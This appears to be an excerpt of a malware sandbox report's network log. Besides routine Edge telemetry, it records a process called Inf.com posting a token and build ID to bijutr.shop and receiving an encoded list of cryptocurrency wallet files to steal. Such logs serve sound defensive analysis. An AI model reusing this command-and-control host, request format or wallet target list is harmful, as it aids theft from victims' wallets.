                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:48 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:48 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  34192.168.2.550015188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:42 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----S26PZCJEC2V37YCBAIMG
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:42 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 53 32 36 50 5a 43 4a 45 43 32 56 33 37 59 43 42 41 49 4d 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 53 32 36 50 5a 43 4a 45 43 32 56 33 37 59 43 42 41 49 4d 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 53 32 36 50 5a 43 4a 45 43 32 56 33 37 59 43 42 41 49 4d 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------S26PZCJEC2V37YCBAIMGContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------S26PZCJEC2V37YCBAIMGContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------S26PZCJEC2V37YCBAIMGCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:44 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:44 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                                  Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  35192.168.2.55002113.89.178.274432372C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:44 UTC1071OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279301810&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 11955
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=3918B198F66063F3328CA4FAF7676296; _EDGE_S=F=1&SID=1DDB83DF79F56C08037C96BD787D6D0A; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:44 UTC11955OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 36 3a 30 31 3a 34 31 2e 38 30 38 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 30 62 33 31 66 37 35 39 2d 61 66 38 39 2d 34 65 35 65 2d 61 62 65 39 2d 36 66 65 66 61 38 64 39 38 65 64 34 22 2c 22 65 70 6f 63 68 22 3a 22 31 38 33 30 38 30 35 39 37 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T06:01:41.808Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"0b31f759-af89-4e5e-abe9-6fefa8d98ed4","epoch":"1830805978"},"app":{"locale
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:45 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=c52f557d03aa48ebae1e0e6695c37953&HASH=c52f&LV=202412&V=4&LU=1735279304731; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:01:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=764f741611a448418ab49609e1f6a652; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:31:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 2921
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:44 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  36192.168.2.55002213.89.178.274432372C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:44 UTC1070OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279301815&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 5220
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=3918B198F66063F3328CA4FAF7676296; _EDGE_S=F=1&SID=1DDB83DF79F56C08037C96BD787D6D0A; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:44 UTC5220OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 36 3a 30 31 3a 34 31 2e 38 31 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 30 62 33 31 66 37 35 39 2d 61 66 38 39 2d 34 65 35 65 2d 61 62 65 39 2d 36 66 65 66 61 38 64 39 38 65 64 34 22 2c 22 65 70 6f 63 68 22 3a 22 31 38 33 30 38 30 35 39 37 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-27T06:01:41.812Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"0b31f759-af89-4e5e-abe9-6fefa8d98ed4","epoch":"1830805978"},"app":{"locale
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:45 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=339b976c6c364b48b456e4050c72f59e&HASH=339b&LV=202412&V=4&LU=1735279304817; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:01:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=d32727faf39441978dd2f5ae6def7ccb; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:31:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 3002
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:44 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  37192.168.2.55002313.89.178.274432372C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:45 UTC1070OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279302807&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 9668
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=3918B198F66063F3328CA4FAF7676296; _EDGE_S=F=1&SID=1DDB83DF79F56C08037C96BD787D6D0A; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:45 UTC9668OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 30 36 3a 30 31 3a 34 32 2e 38 30 36 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 30 62 33 31 66 37 35 39 2d 61 66 38 39 2d 34 65 35 65 2d 61 62 65 39 2d 36 66 65 66 61 38 64 39 38 65 64 34 22 2c 22 65 70 6f 63 68 22 3a 22 31 38 33 30 38 30 35 39 37 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63
                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-27T06:01:42.806Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"0b31f759-af89-4e5e-abe9-6fefa8d98ed4","epoch":"1830805978"},"app":{"loc
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:46 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=8b4d5df696454f4eb312c2b6aaddd205&HASH=8b4d&LV=202412&V=4&LU=1735279305862; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:01:45 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=5f9111643061488abbf91d4314f5eed7; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:31:45 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 3055
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:45 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  38192.168.2.55002413.89.178.274432372C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:45 UTC1060OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279302977&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 5446
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=3918B198F66063F3328CA4FAF7676296; _EDGE_S=F=1&SID=1DDB83DF79F56C08037C96BD787D6D0A; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D
